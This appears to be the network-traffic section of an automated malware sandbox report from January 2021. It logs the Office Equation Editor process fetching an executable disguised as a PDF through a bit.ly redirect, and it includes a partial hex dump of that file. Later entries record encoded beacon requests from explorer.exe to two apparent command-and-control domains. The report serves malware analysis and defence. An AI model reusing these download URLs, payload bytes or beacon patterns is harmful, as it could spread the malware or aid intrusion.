Jan 27, 2021 19:09:20.327136993 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.327155113 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.327172041 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.327176094 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.327187061 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.327214003 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.327214003 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.327231884 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.327248096 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.327250004 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.327264071 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.327279091 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.327287912 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.327294111 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.327308893 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.327325106 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.327325106 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.327342033 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.327362061 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.327399969 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.329704046 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.355930090 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.626640081 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.796428919 CET	49167	80	192.168.2.22	67.199.248.10
Jan 27, 2021 19:10:30.688853979 CET	49170	80	192.168.2.22	35.208.61.46
Jan 27, 2021 19:10:30.842565060 CET	80	49170	35.208.61.46	192.168.2.22
Jan 27, 2021 19:10:30.842731953 CET	49170	80	192.168.2.22	35.208.61.46
Jan 27, 2021 19:10:30.843046904 CET	49170	80	192.168.2.22	35.208.61.46
Jan 27, 2021 19:10:30.996364117 CET	80	49170	35.208.61.46	192.168.2.22
Jan 27, 2021 19:10:30.996458054 CET	80	49170	35.208.61.46	192.168.2.22
Jan 27, 2021 19:10:30.996501923 CET	80	49170	35.208.61.46	192.168.2.22
Jan 27, 2021 19:10:30.996789932 CET	49170	80	192.168.2.22	35.208.61.46
Jan 27, 2021 19:10:30.996884108 CET	49170	80	192.168.2.22	35.208.61.46
Jan 27, 2021 19:10:31.151782990 CET	80	49170	35.208.61.46	192.168.2.22
Jan 27, 2021 19:11:05.458772898 CET	49171	80	192.168.2.22	208.91.197.39
Jan 27, 2021 19:11:05.624989986 CET	80	49171	208.91.197.39	192.168.2.22
Jan 27, 2021 19:11:05.625137091 CET	49171	80	192.168.2.22	208.91.197.39
Jan 27, 2021 19:11:05.625649929 CET	49171	80	192.168.2.22	208.91.197.39
Jan 27, 2021 19:11:05.831619978 CET	80	49171	208.91.197.39	192.168.2.22
Jan 27, 2021 19:11:05.869776964 CET	80	49171	208.91.197.39	192.168.2.22
Jan 27, 2021 19:11:05.869807959 CET	80	49171	208.91.197.39	192.168.2.22
Jan 27, 2021 19:11:05.869834900 CET	80	49171	208.91.197.39	192.168.2.22
Jan 27, 2021 19:11:05.869868994 CET	80	49171	208.91.197.39	192.168.2.22
Jan 27, 2021 19:11:05.869899988 CET	80	49171	208.91.197.39	192.168.2.22
Jan 27, 2021 19:11:05.869925976 CET	80	49171	208.91.197.39	192.168.2.22
Jan 27, 2021 19:11:05.869954109 CET	80	49171	208.91.197.39	192.168.2.22
Jan 27, 2021 19:11:05.869982004 CET	80	49171	208.91.197.39	192.168.2.22
Jan 27, 2021 19:11:05.870007992 CET	80	49171	208.91.197.39	192.168.2.22
Jan 27, 2021 19:11:05.870034933 CET	80	49171	208.91.197.39	192.168.2.22
Jan 27, 2021 19:11:05.870070934 CET	49171	80	192.168.2.22	208.91.197.39
Jan 27, 2021 19:11:05.870085955 CET	49171	80	192.168.2.22	208.91.197.39
Jan 27, 2021 19:11:05.960977077 CET	80	49171	208.91.197.39	192.168.2.22
Jan 27, 2021 19:11:05.961249113 CET	49171	80	192.168.2.22	208.91.197.39
Jan 27, 2021 19:11:06.036313057 CET	80	49171	208.91.197.39	192.168.2.22
Jan 27, 2021 19:11:06.036334038 CET	80	49171	208.91.197.39	192.168.2.22
Jan 27, 2021 19:11:06.036374092 CET	80	49171	208.91.197.39	192.168.2.22
Jan 27, 2021 19:11:06.036410093 CET	80	49171	208.91.197.39	192.168.2.22
Jan 27, 2021 19:11:06.036432028 CET	80	49171	208.91.197.39	192.168.2.22
Jan 27, 2021 19:11:06.036453962 CET	80	49171	208.91.197.39	192.168.2.22
Jan 27, 2021 19:11:06.036473036 CET	80	49171	208.91.197.39	192.168.2.22
Jan 27, 2021 19:11:06.036490917 CET	80	49171	208.91.197.39	192.168.2.22
Jan 27, 2021 19:11:06.036515951 CET	49171	80	192.168.2.22	208.91.197.39
Jan 27, 2021 19:11:06.036549091 CET	49171	80	192.168.2.22	208.91.197.39
Jan 27, 2021 19:11:06.126771927 CET	80	49171	208.91.197.39	192.168.2.22
Jan 27, 2021 19:11:06.127173901 CET	49171	80	192.168.2.22	208.91.197.39
Jan 27, 2021 19:11:06.127296925 CET	49171	80	192.168.2.22	208.91.197.39
Jan 27, 2021 19:11:06.293380022 CET	80	49171	208.91.197.39	192.168.2.22

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 27, 2021 19:09:17.233503103 CET	52197	53	192.168.2.22	8.8.8.8
Jan 27, 2021 19:09:17.283880949 CET	53	52197	8.8.8.8	192.168.2.22
Jan 27, 2021 19:09:17.528387070 CET	53099	53	192.168.2.22	8.8.8.8
Jan 27, 2021 19:09:17.588310957 CET	53	53099	8.8.8.8	192.168.2.22
Jan 27, 2021 19:09:21.933151960 CET	52838	53	192.168.2.22	8.8.8.8
Jan 27, 2021 19:09:21.991836071 CET	53	52838	8.8.8.8	192.168.2.22
Jan 27, 2021 19:10:30.411159039 CET	61200	53	192.168.2.22	8.8.8.8
Jan 27, 2021 19:10:30.674858093 CET	53	61200	8.8.8.8	192.168.2.22
Jan 27, 2021 19:11:05.293935061 CET	49548	53	192.168.2.22	8.8.8.8
Jan 27, 2021 19:11:05.457240105 CET	53	49548	8.8.8.8	192.168.2.22

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Jan 27, 2021 19:09:17.233503103 CET	192.168.2.22	8.8.8.8	0x71dd	Standard query (0)	bit.ly	A (IP address)	IN (0x0001)
Jan 27, 2021 19:09:17.528387070 CET	192.168.2.22	8.8.8.8	0x8b68	Standard query (0)	neuromedic.com.br	A (IP address)	IN (0x0001)
Jan 27, 2021 19:10:30.411159039 CET	192.168.2.22	8.8.8.8	0xa14d	Standard query (0)	www.theprintshop.ink	A (IP address)	IN (0x0001)
Jan 27, 2021 19:11:05.293935061 CET	192.168.2.22	8.8.8.8	0x2e78	Standard query (0)	www.bucklandnewton.net	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class
Jan 27, 2021 19:09:17.283880949 CET	8.8.8.8	192.168.2.22	0x71dd	No error (0)	bit.ly	67.199.248.10	A (IP address)	IN (0x0001)
Jan 27, 2021 19:09:17.283880949 CET	8.8.8.8	192.168.2.22	0x71dd	No error (0)	bit.ly	67.199.248.11	A (IP address)	IN (0x0001)
Jan 27, 2021 19:09:17.588310957 CET	8.8.8.8	192.168.2.22	0x8b68	No error (0)	neuromedic.com.br	177.70.106.69	A (IP address)	IN (0x0001)
Jan 27, 2021 19:10:30.674858093 CET	8.8.8.8	192.168.2.22	0xa14d	No error (0)	www.theprintshop.ink	35.208.61.46	A (IP address)	IN (0x0001)
Jan 27, 2021 19:11:05.457240105 CET	8.8.8.8	192.168.2.22	0x2e78	No error (0)	www.bucklandnewton.net	208.91.197.39	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

bit.ly

neuromedic.com.br

www.theprintshop.ink

www.bucklandnewton.net

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.22	49167	67.199.248.10	80	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Timestamp	kBytes transferred	Direction	Data
Jan 27, 2021 19:09:17.353085995 CET	0	OUT	GET /3oj1Gnn HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: bit.ly Connection: Keep-Alive
Jan 27, 2021 19:09:17.496602058 CET	1	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Wed, 27 Jan 2021 18:09:17 GMT Content-Type: text/html; charset=utf-8 Content-Length: 130 Cache-Control: private, max-age=90 Location: http://neuromedic.com.br/cgi./IMG-11862.pdf Set-Cookie: _bit=l0ri9h-bac8a3fbc50c8cd308-00G; Domain=bit.ly; Expires=Mon, 26 Jul 2021 18:09:17 GMT Via: 1.1 google Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 42 69 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 6e 65 75 72 6f 6d 65 64 69 63 2e 63 6f 6d 2e 62 72 2f 63 67 69 2e 2f 49 4d 47 2d 31 31 38 36 32 2e 70 64 66 22 3e 6d 6f 76 65 64 20 68 65 72 65 3c 2f 61 3e 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>Bitly</title></head><body><a href="http://neuromedic.com.br/cgi./IMG-11862.pdf">moved here</a></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.22	49168	177.70.106.69	80	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Timestamp	kBytes transferred	Direction	Data
Jan 27, 2021 19:09:17.861130953 CET	2	OUT	GET /cgi./IMG-11862.pdf HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Connection: Keep-Alive Host: neuromedic.com.br
Jan 27, 2021 19:09:18.142685890 CET	2	IN	HTTP/1.1 200 OK Date: Wed, 27 Jan 2021 18:08:46 GMT Server: Apache Last-Modified: Tue, 26 Jan 2021 23:44:48 GMT ETag: "1d056bc-cbbe8-5b9d63d6f2877" Accept-Ranges: bytes Content-Length: 834536 Connection: close Content-Type: application/pdf
Jan 27, 2021 19:09:18.142714977 CET	3	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL7FJe @ `
Jan 27, 2021 19:09:18.142738104 CET	5	IN	Data Raw: 75 0c 00 00 01 28 54 00 00 06 74 0c 00 00 01 28 54 00 00 06 74 04 00 00 1b 14 28 17 00 00 06 74 0b 00 00 01 28 4b 00 00 06 75 0c 00 00 01 20 2d 9c 5c 61 fe 0e 02 00 fe 0c 02 00 d7 28 54 00 00 06 74 0c 00 00 01 28 54 00 00 06 74 12 00 00 02 fe 0c Data Ascii: u(Tt(Tt(t(Ku -\a(Tt(Tt(t(Ttr5p(Ku 0X(Tt+(Ku&-(Ku(Ku(Ku 5F
Jan 27, 2021 19:09:18.142759085 CET	6	IN	Data Raw: 00 00 b4 00 00 00 75 00 00 00 87 00 00 00 15 00 00 00 ac 00 00 00 6d 00 00 00 be 00 00 00 a6 00 00 00 2b 00 00 00 59 00 00 00 75 00 00 00 02 8c 01 00 00 1b 14 fe 01 0b 07 2c 05 1a 13 05 2b b7 17 2b f9 7e 06 00 00 04 14 fe 03 0c 08 2c 06 1f 09 13 Data Ascii: um+Yu,++~,++~( a ;(+,8s+ c((sz8Ts8B~( 8 (+(+88*"
Jan 27, 2021 19:09:18.142780066 CET	7	IN	Data Raw: 00 28 4b 00 00 06 75 0b 00 00 01 28 4b 00 00 06 75 02 00 00 02 fe 0e 0c 00 de 00 00 de 00 00 2b 48 00 00 00 28 17 00 00 06 74 0e 00 00 02 fe 0e 0d 00 fe 0c 0d 00 fe 0e 0d 00 fe 0c 00 00 fe 0c 00 00 fe 0c 02 00 28 54 00 00 06 74 11 00 00 02 26 00 Data Ascii: (Ku(Ku+H(t(Tt&(Ku--(Ku(t(Tt(t\(Tt SO(Tt(t(Ku-J
Jan 27, 2021 19:09:18.142802954 CET	9	IN	Data Raw: 00 00 de 12 00 fe 0c 02 00 28 4b 00 00 06 75 09 00 00 02 26 de 00 00 00 00 fe 0c 06 00 fe 0e 06 00 fe 0c 06 00 fe 0e 06 00 00 14 28 17 00 00 06 74 04 00 00 1b fe 0c 02 00 28 4b 00 00 06 75 0c 00 00 01 28 17 00 00 06 74 0c 00 00 01 d9 28 54 00 00 Data Ascii: (Ku&(t(Ku(t(Tt--(t&8-.(t(Tt(Ku&+B(t E(T
Jan 27, 2021 19:09:18.142823935 CET	10	IN	Data Raw: 07 00 00 00 00 00 00 00 07 00 00 00 00 00 00 00 07 00 00 00 d0 21 00 00 06 26 2a 38 63 ff ff ff 00 00 13 30 03 00 b2 00 00 00 16 00 00 11 2b 3e 11 05 45 0b 00 00 00 00 00 00 00 33 00 00 00 4a 00 00 00 0b 00 00 00 6e 00 00 00 33 00 00 00 4a 00 00 Data Ascii: !&8c0+>E3Jn3Ju,N"&++aRYaE+++o$+X X M[Y28b+u+8P0+CE
Jan 27, 2021 19:09:18.142838955 CET	10	IN	Data Raw: 0c 93 13 05 11 0a 74 0e 00 00 1b 11 0c 17 58 93 11 05 61 13 06 1b 13 0e 38 0d ff ff ff 11 0c 19 58 13 0c 11 06 1f 1f 5f 11 06 20 c0 ff 00 00 5f 17 63 60 13 07 1f 0e 13 0e 38 ec fe ff ff 11 06 1f 20 5f 2c 08 1e 13 0e 38 dd fe ff ff 1d 2b f6 11 07 Data Ascii: tXa8X_ _c`8 _,8+bu%Xa`8ui8t/uXYa
Jan 27, 2021 19:09:18.142860889 CET	12	IN	Data Raw: 75 0e 00 00 1b 11 09 11 0c 58 1f 11 58 11 08 5d 93 61 d1 6f 28 00 00 0a 26 1c 13 0e 38 65 fe ff ff 11 09 17 58 13 09 1a 13 0e 38 57 fe ff ff 11 09 11 07 31 09 1f 0b 13 0e 38 48 fe ff ff 1f 0a 2b f5 11 04 74 2f 00 00 01 6f 19 00 00 0a 0d 7e 0e 00 Data Ascii: uXX]ao(&8eX8W18H+t/o~tu8t*0+CED,Nzk3sT.)&++aDYaE+++(
Jan 27, 2021 19:09:18.142885923 CET	13	IN	Data Raw: 1b 28 14 00 00 0a 20 84 01 00 00 20 e9 01 00 00 28 0b 00 00 2b 74 04 00 00 1b fe 0b 00 00 1d 13 05 38 3f ff ff ff 09 74 20 00 00 01 0a 06 74 20 00 00 01 2a 00 00 13 30 04 00 d2 00 00 00 1e 00 00 11 7e 11 00 00 04 13 06 2b 43 11 05 45 0c 00 00 00 Data Ascii: ( (+t8?t t 0~+CE7Xb>>1&++aYaEZ /Y+++o.8qX F v
Jan 27, 2021 19:09:18.412144899 CET	15	IN	Data Raw: 2b 73 1b 00 00 0a 13 09 18 13 16 2b aa 1b 20 d4 90 ef 63 18 14 28 28 00 00 06 13 0a 11 09 74 1e 00 00 01 11 0a 74 0b 00 00 01 20 f4 02 00 00 20 de 02 00 00 28 10 00 00 2b 74 04 00 00 1b 13 0b 1c 13 16 38 6f ff ff ff 11 0b 74 04 00 00 1b 0a dd b0 Data Ascii: +s+ c((tt (+t8ot% (+ ;(E+++ti:+%(#(E

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.22	49170	35.208.61.46	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 27, 2021 19:10:30.843046904 CET	937	OUT	GET /bsl/?NN=iMJGa3GxI6UtmkdzIO42CvbImt4iBZLhcRTuFhGcNs1w9EATRUa5v41vQqTOTJ8d8FsBhw==&Epu=zv50BpeHpnjp HTTP/1.1 Host: www.theprintshop.ink Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Jan 27, 2021 19:10:30.996458054 CET	938	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Wed, 27 Jan 2021 18:10:30 GMT Content-Type: text/html Content-Length: 162 Connection: close Location: https://www.theprintshop.ink/bsl/?NN=iMJGa3GxI6UtmkdzIO42CvbImt4iBZLhcRTuFhGcNs1w9EATRUa5v41vQqTOTJ8d8FsBhw==&Epu=zv50BpeHpnjp Host-Header: 8441280b0c35cbc1147f8ba998a563a7 X-HTTPS-Enforce: 1 X-Proxy-Cache-Info: DT:1 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.22	49171	208.91.197.39	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 27, 2021 19:11:05.625649929 CET	940	OUT	GET /bsl/?NN=GgBvVf5PQIOdcMEbYgw1IQ+nD3ax/bg71NWpn/5pwbnZwl7mOlCqEE4iezeCyF4VQz1gwg==&Epu=zv50BpeHpnjp HTTP/1.1 Host: www.bucklandnewton.net Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Jan 27, 2021 19:11:05.869776964 CET	941	IN	HTTP/1.1 200 OK Date: Wed, 27 Jan 2021 18:11:05 GMT Server: Apache Set-Cookie: vsid=925vr3593166657424688; expires=Mon, 26-Jan-2026 18:11:05 GMT; Max-Age=157680000; path=/; domain=www.bucklandnewton.net; HttpOnly X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_CyAXn8uf9Mysi+MO7CPSkVqz6yqftanfFoWO52v93D5j0wDoXMvz4iSdS45R+/NaLISga+bdi0mXfgcIY9qPNg== Keep-Alive: timeout=5, max=115 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 Data Raw: 36 34 30 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4b 58 37 34 69 78 70 7a 56 79 58 62 4a 70 72 63 4c 66 62 48 34 70 73 50 34 2b 4c 32 65 6e 74 71 72 69 30 6c 7a 68 36 70 6b 41 61 58 4c 50 49 63 63 6c 76 36 44 51 42 65 4a 4a 6a 47 46 57 72 42 49 46 36 51 4d 79 46 77 58 54 35 43 43 52 79 6a 53 32 70 65 6e 45 43 41 77 45 41 41 51 3d 3d 5f 43 79 41 58 6e 38 75 66 39 4d 79 73 69 2b 4d 4f 37 43 50 53 6b 56 71 7a 36 79 71 66 74 61 6e 66 46 6f 57 4f 35 32 76 39 33 44 35 6a 30 77 44 6f 58 4d 76 7a 34 69 53 64 53 34 35 52 2b 2f 4e 61 4c 49 53 67 61 2b 62 64 69 30 6d 58 66 67 63 49 59 39 71 50 4e 67 3d 3d 22 3e 0d 0a 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 76 61 72 20 61 62 70 3b 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 62 75 63 6b 6c 61 6e 64 6e 65 77 74 6f 6e 2e 6e 65 74 2f 70 78 2e 6a 73 3f 63 68 3d 31 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 62 75 63 6b 6c 61 6e 64 6e 65 77 74 6f 6e 2e 6e 65 74 2f 70 78 2e 6a 73 3f 63 68 3d 32 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 66 75 6e 63 74 69 6f 6e 20 68 61 6e 64 6c 65 41 42 50 44 65 74 65 63 74 28 29 7b 74 72 79 7b 69 66 28 21 61 62 70 29 20 72 65 74 75 72 6e 3b 76 61 72 20 69 6d 67 6c 6f 67 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 69 6d 67 22 29 3b 69 6d 67 6c 6f 67 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 30 70 78 22 Data Ascii: 6403<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_CyAXn8uf9Mysi+MO7CPSkVqz6yqftanfFoWO52v93D5j0wDoXMvz4iSdS45R+/NaLISga+bdi0mXfgcIY9qPNg=="><head><script type="text/javascript">var abp;</script><script type="text/javascript" src="http://www.bucklandnewton.net/px.js?ch=1"></script><script type="text/javascript" src="http://www.bucklandnewton.net/px.js?ch=2"></script><script type="text/javascript">function handleABPDetect(){try{if(!abp) return;var imglog = document.createElement("img");imglog.style.height="0px"
Jan 27, 2021 19:11:05.869807959 CET	943	IN	Data Raw: 3b 69 6d 67 6c 6f 67 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 22 30 70 78 22 3b 69 6d 67 6c 6f 67 2e 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 62 75 63 6b 6c 61 6e 64 6e 65 77 74 6f 6e 2e 6e 65 74 2f 73 6b 2d 6c 6f 67 61 62 70 73 74 61 74 75 Data Ascii: ;imglog.style.width="0px";imglog.src="http://www.bucklandnewton.net/sk-logabpstatus.php?a=MHIyY1J0bU5EU1JINjNmRVdwN0xhOXFoZTBaOWx4bDlPNWt3RWlYbzhvak1nYjFnOXNPNjVKVHUvSitKNlppNlI2U0UzOXlDbWFHWlhwdHVzQlUxVk9ma0o2WFZiS01BcG1vMHhyR3NuRm89&b="+abp;
Jan 27, 2021 19:11:05.869834900 CET	944	IN	Data Raw: 63 73 2f 38 39 33 32 2f 61 72 72 6f 77 73 2e 6a 70 67 29 7d 2a 2f 0d 0a 23 6d 61 69 6e 2d 77 72 61 70 7b 2f 2a 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 68 74 74 70 3a 2f 2f 69 33 2e 63 64 6e 2d 69 6d 61 67 65 2e 63 6f 6d 2f 5f 5f 6d 65 64 69 Data Ascii: cs/8932/arrows.jpg)}/#main-wrap{/background:url(http://i3.cdn-image.com/__media__/pics/7985/headerstrip.gif) top center repeat-x;*/ background-size:100% 100px}#header { margin: 0px;}#header .head-pad { padding:18px 0px; float
Jan 27, 2021 19:11:05.869868994 CET	945	IN	Data Raw: 72 7b 68 65 69 67 68 74 3a 39 30 70 78 3b 20 7d 0d 0a 2e 6c 65 66 74 62 6c 6b 7b 66 6c 6f 61 74 3a 6c 65 66 74 3b 20 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 0d 0a 2e 6c 65 66 74 62 6c 6b 20 69 6d 67 7b 66 6c 6f 61 74 3a 20 6c 65 66 74 3b Data Ascii: r{height:90px; }.leftblk{float:left; overflow:hidden}.leftblk img{float: left; margin-top:22px; *margin-top:18px; padding-right: 15px;}.domain_name{float:left; line-height:100px; font-size:26px; font-weight: normal; color:#fff; text-shad
Jan 27, 2021 19:11:05.869899988 CET	947	IN	Data Raw: 74 3a 6c 65 66 74 3b 77 69 64 74 68 3a 32 38 36 70 78 3b 20 68 65 69 67 68 74 3a 34 32 35 70 78 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 2d 32 70 78 20 33 33 70 78 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 Data Ascii: t:left;width:286px; height:425px; background-position:-2px 33px; background-repeat:no-repeat}.kwd_bloack{float:left; width:388px; margin-top:50px}.kwd_bloack h4{font-size:13px; line-height:18px; color:#8a8888; padding-left: 4px; text-trans
Jan 27, 2021 19:11:05.869925976 CET	948	IN	Data Raw: 2d 73 69 7a 65 3a 31 32 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 37 34 70 78 3b 20 63 6f 6c 6f 72 3a 23 63 30 63 30 63 30 3b 20 20 70 61 64 64 69 6e 67 3a 20 30 20 35 70 78 3b 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 Data Ascii: -size:12px; line-height:74px; color:#c0c0c0; padding: 0 5px; text-decoration:underline}.footer-nav a:hover{text-decoration: none}/*.inquire {text-align:right; padding-top:10px; color:#fff}.inquire a {font-size:12px; font-weight:normal
Jan 27, 2021 19:11:05.869954109 CET	949	IN	Data Raw: 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 20 32 37 70 78 20 37 30 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 20 38 38 25 20 61 75 74 6f 3b 7d 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 2f 2a 20 20 23 6d 61 69 6e 2d 77 72 61 70 7b 62 61 63 6b 67 Data Ascii: ound-position: 27px 70px;background-size: 88% auto;}/* #main-wrap{background-size:100% 237px} .container{width:100%} .header, .bottom_rs ul{height:auto} .leftblk{float:none; padding:0 5px} .domain_name{line-h
Jan 27, 2021 19:11:05.869982004 CET	951	IN	Data Raw: 38 70 78 3b 7d 0d 0a 0d 0a 7d 0d 0a 0d 0a 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 20 3a 20 36 30 30 70 78 29 20 7b 0d 0a 23 68 65 61 64 65 72 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 Data Ascii: 8px;}}@media only screen and (max-width : 600px) {#header{text-align: center;}#header .headTop .rightBlock{float: none;}#header h1 a{font-size: 22px;}#header .leftBlock p a{display: inline-block;float: none;padding: 5px 0;}.
